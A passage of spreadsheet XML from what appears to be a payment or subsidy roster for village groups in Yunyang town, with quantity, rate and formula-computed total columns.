        <v>1</v>
      </c>
      <c r="H1345" s="18">
        <v>365</v>
      </c>
      <c r="I1345" s="17">
        <f>H1345*G1345</f>
        <v>365</v>
      </c>
      <c r="J1345" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1345" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1346" customHeight="1" spans="1:11">
      <c r="A1346" s="16" t="s">
        <v>3638</v>
      </c>
      <c r="B1346" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1346" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1346" s="17" t="s">
        <v>3639</v>
      </c>
      <c r="E1346" s="17" t="s">
        <v>3640</v>
      </c>
      <c r="F1346" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1346" s="17">
        <v>2</v>
      </c>
      <c r="H1346" s="18">
        <v>355</v>
      </c>
      <c r="I1346" s="17">
        <f>H1346*G1346</f>
        <v>710</v>
      </c>
      <c r="J1346" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1346" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1347" customHeight="1" spans="1:11">
      <c r="A1347" s="16" t="s">
        <v>3641</v>
      </c>
      <c r="B1347" s="17" t="str">
        <f>B1346</f>
        <v>云阳镇</v>
      </c>
      <c r="C1347" s="17" t="str">
        <f>C1346</f>
        <v>大关一组</v>
      </c>
      <c r="D1347" s="16" t="s">
        <v>3642</v>
      </c>
      <c r="E1347" s="16" t="s">
        <v>3643</v>
      </c>
      <c r="F1347" s="17" t="str">
        <f>F1346</f>
        <v>4113210522</v>
      </c>
      <c r="G1347" s="17"/>
      <c r="H1347" s="17"/>
      <c r="I1347" s="17"/>
      <c r="J1347" s="17"/>
      <c r="K1347" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1348" customHeight="1" spans="1:11">
      <c r="A1348" s="16" t="s">
        <v>3644</v>
      </c>
      <c r="B1348" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1348" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1348" s="17" t="s">
        <v>3645</v>
      </c>
      <c r="E1348" s="17" t="s">
        <v>3646</v>
      </c>
      <c r="F1348" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1348" s="17">
        <v>1</v>
      </c>
      <c r="H1348" s="18">
        <v>365</v>
      </c>
      <c r="I1348" s="17">
        <f t="shared" ref="I1348:I1353" si="68">H1348*G1348</f>
        <v>365</v>
      </c>
      <c r="J1348" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1348" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1349" customHeight="1" spans="1:11">
      <c r="A1349" s="16" t="s">
        <v>3647</v>
      </c>
      <c r="B1349" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1349" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1349" s="17" t="s">
        <v>3648</v>
      </c>
      <c r="E1349" s="17" t="s">
        <v>3510</v>
      </c>
      <c r="F1349" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1349" s="17">
        <v>1</v>
      </c>
      <c r="H1349" s="18">
        <v>365</v>
      </c>
      <c r="I1349" s="17">
        <f t="shared" si="68"/>
        <v>365</v>
      </c>
      <c r="J1349" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1349" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1350" customHeight="1" spans="1:11">
      <c r="A1350" s="16" t="s">
        <v>3649</v>
      </c>
      <c r="B1350" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1350" s="17" t="s">
        <v>3631</v>
      </c>
      <c r="D1350" s="17" t="s">
        <v>3650</v>
      </c>
      <c r="E1350" s="17" t="s">
        <v>3651</v>
      </c>
      <c r="F1350" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1350" s="17">
        <v>1</v>
      </c>
      <c r="H1350" s="18">
        <v>365</v>
      </c>
      <c r="I1350" s="17">
        <f t="shared" si="68"/>
        <v>365</v>
      </c>
      <c r="J1350" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1350" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1351" customHeight="1" spans="1:11">
      <c r="A1351" s="16" t="s">
        <v>3652</v>
      </c>
      <c r="B1351" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1351" s="17" t="s">
        <v>3590</v>
      </c>
      <c r="D1351" s="17" t="s">
        <v>3653</v>
      </c>
      <c r="E1351" s="17" t="s">
        <v>3654</v>
      </c>
      <c r="F1351" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1351" s="17">
        <v>1</v>
      </c>
      <c r="H1351" s="18">
        <v>365</v>
      </c>
      <c r="I1351" s="17">
        <f t="shared" si="68"/>
        <v>365</v>
      </c>
      <c r="J1351" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1351" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1352" customHeight="1" spans="1:11">
      <c r="A1352" s="16" t="s">
        <v>3655</v>
      </c>
      <c r="B1352" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1352" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1352" s="17" t="s">
        <v>3656</v>
      </c>
      <c r="E1352" s="17" t="s">
        <v>3657</v>
      </c>
      <c r="F1352" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1352" s="17">
        <v>1</v>
      </c>
      <c r="H1352" s="18">
        <v>365</v>
      </c>
      <c r="I1352" s="17">
        <f t="shared" si="68"/>
        <v>365</v>
      </c>
      <c r="J1352" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1352" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1353" customHeight="1" spans="1:11">
      <c r="A1353" s="16" t="s">
        <v>3658</v>
      </c>
      <c r="B1353" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1353" s="17" t="s">
        <v>3659</v>
      </c>
      <c r="D1353" s="17" t="s">
        <v>3660</v>
      </c>
      <c r="E1353" s="17" t="s">
        <v>3661</v>
      </c>
      <c r="F1353" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1353" s="17">
        <v>2</v>
      </c>
      <c r="H1353" s="18">
        <v>325</v>
      </c>
      <c r="I1353" s="17">
        <f t="shared" si="68"/>
        <v>650</v>
      </c>
      <c r="J1353" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1353" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1354" customHeight="1" spans="1:11">
      <c r="A1354" s="16" t="s">
        <v>3662</v>
      </c>
      <c r="B1354" s="17" t="str">
        <f>B1353</f>
        <v>云阳镇</v>
      </c>
      <c r="C1354" s="17" t="str">
        <f>C1353</f>
        <v>南召店南头</v>
      </c>
      <c r="D1354" s="16" t="s">
        <v>3663</v>
      </c>
      <c r="E1354" s="16" t="s">
        <v>3664</v>
      </c>
      <c r="F1354" s="17" t="str">
        <f>F1353</f>
        <v>4113210519</v>
      </c>
      <c r="G1354" s="17"/>
      <c r="H1354" s="17"/>
      <c r="I1354" s="17"/>
      <c r="J1354" s="17"/>
      <c r="K1354" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1355" customHeight="1" spans="1:11">
      <c r="A1355" s="16" t="s">
        <v>3665</v>
      </c>
      <c r="B1355" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1355" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1355" s="17" t="s">
        <v>3666</v>
      </c>
      <c r="E1355" s="17" t="s">
        <v>3667</v>
      </c>
      <c r="F1355" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1355" s="17">
        <v>1</v>
      </c>
      <c r="H1355" s="18">
        <v>365</v>
      </c>
      <c r="I1355" s="17">
        <f t="shared" ref="I1355:I1363" si="69">H1355*G1355</f>
        <v>365</v>
      </c>
      <c r="J1355" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1355" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1356" customHeight="1" spans="1:11">
      <c r="A1356" s="16" t="s">
        <v>3668</v>
      </c>
      <c r="B1356" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1356" s="17" t="s">
        <v>3572</v>
      </c>
      <c r="D1356" s="17" t="s">
        <v>3669</v>
      </c>
      <c r="E1356" s="17" t="s">
        <v>3604</v>
      </c>
      <c r="F1356" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1356" s="17">
        <v>1</v>
      </c>
      <c r="H1356" s="18">
        <v>365</v>
      </c>
      <c r="I1356" s="17">
        <f t="shared" si="69"/>
        <v>365</v>
      </c>
      <c r="J1356" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1356" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1357" customHeight="1" spans="1:11">
      <c r="A1357" s="16" t="s">
        <v>3670</v>
      </c>
      <c r="B1357" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1357" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1357" s="17" t="s">
        <v>3671</v>
      </c>
      <c r="E1357" s="17" t="s">
        <v>3661</v>
      </c>
      <c r="F1357" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1357" s="17">
        <v>1</v>
      </c>
      <c r="H1357" s="18">
        <v>365</v>
      </c>
      <c r="I1357" s="17">
        <f t="shared" si="69"/>
        <v>365</v>
      </c>
      <c r="J1357" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1357" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1358" customHeight="1" spans="1:11">
      <c r="A1358" s="16" t="s">
        <v>3672</v>
      </c>
      <c r="B1358" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1358" s="17" t="s">
        <v>3673</v>
      </c>
      <c r="D1358" s="17" t="s">
        <v>3674</v>
      </c>
      <c r="E1358" s="17" t="s">
        <v>3675</v>
      </c>
      <c r="F1358" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1358" s="17">
        <v>1</v>
      </c>
      <c r="H1358" s="18">
        <v>365</v>
      </c>
      <c r="I1358" s="17">
        <f t="shared" si="69"/>
        <v>365</v>
      </c>
      <c r="J1358" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1358" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1359" customHeight="1" spans="1:11">
      <c r="A1359" s="16" t="s">
        <v>3677</v>
      </c>
      <c r="B1359" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1359" s="17" t="s">
        <v>3678</v>
      </c>
      <c r="D1359" s="17" t="s">
        <v>3679</v>
      </c>
      <c r="E1359" s="17" t="s">
        <v>2572</v>
      </c>
      <c r="F1359" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1359" s="17">
        <v>1</v>
      </c>
      <c r="H1359" s="18">
        <v>365</v>
      </c>
      <c r="I1359" s="17">
        <f t="shared" si="69"/>
        <v>365</v>
      </c>
      <c r="J1359" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1359" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1360" customHeight="1" spans="1:11">
      <c r="A1360" s="16" t="s">
        <v>3680</v>
      </c>
      <c r="B1360" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1360" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1360" s="17" t="s">
        <v>3681</v>
      </c>
      <c r="E1360" s="17" t="s">
        <v>3682</v>
      </c>
      <c r="F1360" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1360" s="17">
        <v>1</v>
      </c>
      <c r="H1360" s="18">
        <v>365</v>
      </c>
      <c r="I1360" s="17">
        <f t="shared" si="69"/>
        <v>365</v>
      </c>
      <c r="J1360" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1360" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1361" customHeight="1" spans="1:11">
      <c r="A1361" s="16" t="s">
        <v>3683</v>
      </c>
      <c r="B1361" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1361" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1361" s="17" t="s">
        <v>3684</v>
      </c>
      <c r="E1361" s="17" t="s">
        <v>3651</v>
      </c>
      <c r="F1361" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1361" s="17">
        <v>2</v>
      </c>
      <c r="H1361" s="18">
        <v>325</v>
      </c>
      <c r="I1361" s="17">
        <f t="shared" si="69"/>
        <v>650</v>
      </c>
      <c r="J1361" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1361" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1362" customHeight="1" spans="1:11">
      <c r="A1362" s="16" t="s">
        <v>3685</v>
      </c>
      <c r="B1362" s="17" t="str">
        <f>B1361</f>
        <v>云阳镇</v>
      </c>
      <c r="C1362" s="17" t="str">
        <f>C1361</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1362" s="16" t="s">
        <v>3686</v>
      </c>
      <c r="E1362" s="16" t="s">
        <v>3614</v>
      </c>
      <c r="F1362" s="17" t="str">
        <f>F1361</f>
        <v>4113210519</v>
      </c>
      <c r="G1362" s="17"/>
      <c r="H1362" s="17"/>
      <c r="I1362" s="17"/>
      <c r="J1362" s="17"/>
      <c r="K1362" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1363" customHeight="1" spans="1:11">
      <c r="A1363" s="16" t="s">
        <v>3687</v>
      </c>
      <c r="B1363" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1363" s="17" t="s">
        <v>3688</v>
      </c>
      <c r="D1363" s="17" t="s">
        <v>3689</v>
      </c>
      <c r="E1363" s="17" t="s">
        <v>3690</v>
      </c>
      <c r="F1363" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1363" s="17">
        <v>1</v>
      </c>
      <c r="H1363" s="18">
        <v>365</v>
      </c>
      <c r="I1363" s="17">
        <f>H1363*G1363</f>
        <v>365</v>
      </c>
      <c r="J1363" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1363" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1364" customHeight="1" spans="1:11">
      <c r="A1364" s="16" t="s">
        <v>3691</v>
      </c>
      <c r="B1364" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1364" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1364" s="17" t="s">
        <v>3692</v>
      </c>
      <c r="E1364" s="17" t="s">
        <v>3693</v>
      </c>
      <c r="F1364" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1364" s="17">
        <v>1</v>
      </c>
      <c r="H1364" s="18">
        <v>365</v>
      </c>
      <c r="I1364" s="17">
        <f>H1364*G1364</f>
        <v>365</v>
      </c>
      <c r="J1364" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1364" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1365" customHeight="1" spans="1:11">
      <c r="A1365" s="16" t="s">
        <v>3694</v>
      </c>
      <c r="B1365" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1365" s="17" t="s">
        <v>3695</v>
      </c>
      <c r="D1365" s="17" t="s">
        <v>3696</v>
      </c>
      <c r="E1365" s="17" t="s">
        <v>3657</v>
      </c>
      <c r="F1365" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1365" s="17">
        <v>2</v>
      </c>
      <c r="H1365" s="18">
        <v>325</v>
      </c>
      <c r="I1365" s="17">
        <f>H1365*G1365</f>
        <v>650</v>
      </c>
      <c r="J1365" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1365" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1366" customHeight="1" spans="1:11">
      <c r="A1366" s="16" t="s">
        <v>3697</v>
      </c>
      <c r="B1366" s="17" t="str">
        <f>B1365</f>
        <v>云阳镇</v>
      </c>
      <c r="C1366" s="17" t="str">
        <f>C1365</f>
        <v>镇直（政府）</v>
      </c>
      <c r="D1366" s="16" t="s">
        <v>3698</v>
      </c>
      <c r="E1366" s="16" t="s">
        <v>3699</v>
      </c>
      <c r="F1366" s="17" t="str">
        <f>F1365</f>
        <v>4113210599</v>
      </c>
      <c r="G1366" s="17"/>
      <c r="H1366" s="17"/>
      <c r="I1366" s="17"/>
      <c r="J1366" s="17"/>
      <c r="K1366" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1367" customHeight="1" spans="1:11">
      <c r="A1367" s="16" t="s">
        <v>3700</v>
      </c>
      <c r="B1367" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1367" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1367" s="17" t="s">
        <v>3701</v>
      </c>
      <c r="E1367" s="17" t="s">
        <v>3702</v>
      </c>
      <c r="F1367" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1367" s="17">
        <v>1</v>
      </c>
      <c r="H1367" s="18">
        <v>365</v>
      </c>
      <c r="I1367" s="17">
        <f>H1367*G1367</f>
        <v>365</v>
      </c>
      <c r="J1367" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1367" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1368" customHeight="1" spans="1:11">
      <c r="A1368" s="16" t="s">
        <v>3703</v>
      </c>
      <c r="B1368" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1368" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1368" s="17" t="s">
        <v>3704</v>
      </c>
      <c r="E1368" s="17" t="s">
        <v>3614</v>
      </c>
      <c r="F1368" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1368" s="17">
        <v>2</v>
      </c>
      <c r="H1368" s="18">
        <v>325</v>
      </c>
      <c r="I1368" s="17">
        <f>H1368*G1368</f>
        <v>650</v>
      </c>
      <c r="J1368" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1368" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1369" customHeight="1" spans="1:11">
      <c r="A1369" s="16" t="s">
        <v>3705</v>
      </c>
      <c r="B1369" s="17" t="str">
        <f>B1368</f>
        <v>云阳镇</v>
      </c>
      <c r="C1369" s="17" t="str">
        <f>C1368</f>
        <v>大关一组</v>
      </c>
      <c r="D1369" s="16" t="s">
        <v>3706</v>
      </c>
      <c r="E1369" s="16" t="s">
        <v>3707</v>
      </c>
      <c r="F1369" s="17" t="str">
        <f>F1368</f>
        <v>4113210522</v>
      </c>
      <c r="G1369" s="17"/>
      <c r="H1369" s="17"/>
      <c r="I1369" s="17"/>
      <c r="J1369" s="17"/>
      <c r="K1369" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1370" customHeight="1" spans="1:11">
      <c r="A1370" s="16" t="s">
        <v>3708</v>
      </c>
      <c r="B1370" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1370" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1370" s="17" t="s">
        <v>3709</v>
      </c>
      <c r="E1370" s="17" t="s">
        <v>3710</v>
      </c>
      <c r="F1370" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1370" s="17">
        <v>2</v>
      </c>
      <c r="H1370" s="18">
        <v>325</v>
      </c>
      <c r="I1370" s="17">
        <f>H1370*G1370</f>
        <v>650</v>
      </c>
      <c r="J1370" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1370" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1371" customHeight="1" spans="1:11">
      <c r="A1371" s="16" t="s">
        <v>3711</v>
      </c>
      <c r="B1371" s="17" t="str">
        <f>B1370</f>
        <v>云阳镇</v>
      </c>
      <c r="C1371" s="17" t="str">
        <f>C1370</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1371" s="16" t="s">
        <v>3712</v>
      </c>
      <c r="E1371" s="16" t="s">
        <v>3699</v>
      </c>
      <c r="F1371" s="17" t="str">
        <f>F1370</f>
        <v>4113210519</v>
      </c>
      <c r="G1371" s="17"/>
      <c r="H1371" s="17"/>
      <c r="I1371" s="17"/>
      <c r="J1371" s="17"/>
      <c r="K1371" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1372" customHeight="1" spans="1:11">
      <c r="A1372" s="16" t="s">
        <v>3713</v>
      </c>
      <c r="B1372" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1372" s="17" t="s">
        <v>3590</v>
      </c>
      <c r="D1372" s="17" t="s">
        <v>3714</v>
      </c>
      <c r="E1372" s="17" t="s">
        <v>3715</v>
      </c>
      <c r="F1372" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1372" s="17">
        <v>1</v>
      </c>
      <c r="H1372" s="18">
        <v>365</v>
      </c>
      <c r="I1372" s="17">
        <f>H1372*G1372</f>
        <v>365</v>
      </c>
      <c r="J1372" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1372" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1373" customHeight="1" spans="1:11">
      <c r="A1373" s="16" t="s">
        <v>3716</v>
      </c>
      <c r="B1373" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1373" s="17" t="s">
        <v>3590</v>
      </c>
      <c r="D1373" s="17" t="s">
        <v>3717</v>
      </c>
      <c r="E1373" s="17" t="s">
        <v>3601</v>
      </c>
      <c r="F1373" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1373" s="17">
        <v>1</v>
      </c>
      <c r="H1373" s="18">
        <v>365</v>
      </c>
      <c r="I1373" s="17">
        <f>H1373*G1373</f>
        <v>365</v>
      </c>
      <c r="J1373" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1373" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1374" customHeight="1" spans="1:11">
      <c r="A1374" s="16" t="s">
        <v>3718</v>
      </c>
      <c r="B1374" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1374" s="17" t="s">
        <v>3635</v>
      </c>
      <c r="D1374" s="17" t="s">
        <v>3719</v>
      </c>
      <c r="E1374" s="17" t="s">
        <v>3614</v>
      </c>
      <c r="F1374" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1374" s="17">
        <v>1</v>
      </c>
      <c r="H1374" s="18">
        <v>365</v>
      </c>
      <c r="I1374" s="17">
        <f>H1374*G1374</f>
        <v>365</v>
      </c>
      <c r="J1374" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1374" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1375" customHeight="1" spans="1:11">
      <c r="A1375" s="16" t="s">
        <v>3720</v>
      </c>
      <c r="B1375" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1375" s="17" t="s">
        <v>3561</v>
      </c>
      <c r="D1375" s="17" t="s">
        <v>3721</v>
      </c>
      <c r="E1375" s="17" t="s">
        <v>2578</v>
      </c>
      <c r="F1375" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1375" s="17">
        <v>1</v>
      </c>
      <c r="H1375" s="18">
        <v>365</v>
      </c>
      <c r="I1375" s="17">
        <f>H1375*G1375</f>
        <v>365</v>
      </c>
      <c r="J1375" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1375" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1376" customHeight="1" spans="1:11">
      <c r="A1376" s="16" t="s">
        <v>3722</v>
      </c>
      <c r="B1376" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1376" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1376" s="17" t="s">
        <v>3723</v>
      </c>
      <c r="E1376" s="17" t="s">
        <v>3724</v>
      </c>
      <c r="F1376" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1376" s="17">
        <v>2</v>
      </c>
      <c r="H1376" s="18">
        <v>325</v>
      </c>
      <c r="I1376" s="17">
        <f>H1376*G1376</f>
        <v>650</v>
      </c>
      <c r="J1376" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1376" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1377" customHeight="1" spans="1:11">
      <c r="A1377" s="16" t="s">
        <v>3725</v>
      </c>
      <c r="B1377" s="17" t="str">
        <f>B1376</f>
        <v>云阳镇</v>
      </c>
      <c r="C1377" s="17" t="str">
        <f>C1376</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1377" s="16" t="s">
        <v>3726</v>
      </c>
      <c r="E1377" s="16" t="s">
        <v>3727</v>
      </c>
      <c r="F1377" s="17" t="str">
        <f>F1376</f>
        <v>4113210519</v>
      </c>
      <c r="G1377" s="17"/>
      <c r="H1377" s="17"/>
      <c r="I1377" s="17"/>
      <c r="J1377" s="17"/>
      <c r="K1377" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1378" customHeight="1" spans="1:11">
      <c r="A1378" s="16" t="s">
        <v>3728</v>
      </c>
      <c r="B1378" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1378" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1378" s="17" t="s">
        <v>3729</v>
      </c>
      <c r="E1378" s="17" t="s">
        <v>3618</v>
      </c>
      <c r="F1378" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1378" s="17">
        <v>1</v>
      </c>
      <c r="H1378" s="18">
        <v>365</v>
      </c>
      <c r="I1378" s="17">
        <f>H1378*G1378</f>
        <v>365</v>
      </c>
      <c r="J1378" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1378" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1379" customHeight="1" spans="1:11">
      <c r="A1379" s="16" t="s">
        <v>3730</v>
      </c>
      <c r="B1379" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1379" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1379" s="17" t="s">
        <v>3731</v>
      </c>
      <c r="E1379" s="17" t="s">
        <v>2558</v>
      </c>
      <c r="F1379" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1379" s="17">
        <v>1</v>
      </c>
      <c r="H1379" s="18">
        <v>365</v>
      </c>
      <c r="I1379" s="17">
        <f>H1379*G1379</f>
        <v>365</v>
      </c>
      <c r="J1379" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1379" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1380" customHeight="1" spans="1:11">
      <c r="A1380" s="16" t="s">
        <v>3732</v>
      </c>
      <c r="B1380" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1380" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1380" s="17" t="s">
        <v>3733</v>
      </c>
      <c r="E1380" s="17" t="s">
        <v>3734</v>
      </c>
      <c r="F1380" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1380" s="17">
        <v>1</v>
      </c>
      <c r="H1380" s="18">
        <v>365</v>
      </c>
      <c r="I1380" s="17">
        <f>H1380*G1380</f>
        <v>365</v>
      </c>
      <c r="J1380" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1380" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1381" customHeight="1" spans="1:11">
      <c r="A1381" s="16" t="s">
        <v>3735</v>
      </c>
      <c r="B1381" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1381" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1381" s="17" t="s">
        <v>3736</v>
      </c>
      <c r="E1381" s="17" t="s">
        <v>3727</v>
      </c>
      <c r="F1381" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1381" s="17">
        <v>1</v>
      </c>
      <c r="H1381" s="18">
        <v>365</v>
      </c>
      <c r="I1381" s="17">
        <f>H1381*G1381</f>
        <v>365</v>
      </c>
      <c r="J1381" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1381" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1382" customHeight="1" spans="1:11">
      <c r="A1382" s="16" t="s">
        <v>3737</v>
      </c>
      <c r="B1382" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1382" s="17" t="s">
        <v>3561</v>
      </c>
      <c r="D1382" s="17" t="s">
        <v>3738</v>
      </c>
      <c r="E1382" s="17" t="s">
        <v>3739</v>
      </c>
      <c r="F1382" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1382" s="17">
        <v>1</v>
      </c>
      <c r="H1382" s="18">
        <v>365</v>
      </c>
      <c r="I1382" s="17">
        <f>H1382*G1382</f>
        <v>365</v>
      </c>
      <c r="J1382" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1382" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1383" customHeight="1" spans="1:11">
      <c r="A1383" s="16" t="s">
        <v>3740</v>
      </c>
      <c r="B1383" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1383" s="17" t="s">
        <v>3741</v>
      </c>
      <c r="D1383" s="17" t="s">
        <v>3742</v>
      </c>
      <c r="E1383" s="17" t="s">
        <v>3618</v>
      </c>
      <c r="F1383" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1383" s="17">
        <v>1</v>
      </c>
      <c r="H1383" s="18">
        <v>365</v>
      </c>
      <c r="I1383" s="17">
        <f t="shared" ref="I1383:I1396" si="70">H1383*G1383</f>
        <v>365</v>
      </c>
      <c r="J1383" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1383" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1384" customHeight="1" spans="1:11">
      <c r="A1384" s="16" t="s">
        <v>3743</v>
      </c>
      <c r="B1384" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1384" s="17" t="s">
        <v>3659</v>
      </c>
      <c r="D1384" s="17" t="s">
        <v>3744</v>
      </c>
      <c r="E1384" s="17" t="s">
        <v>3661</v>
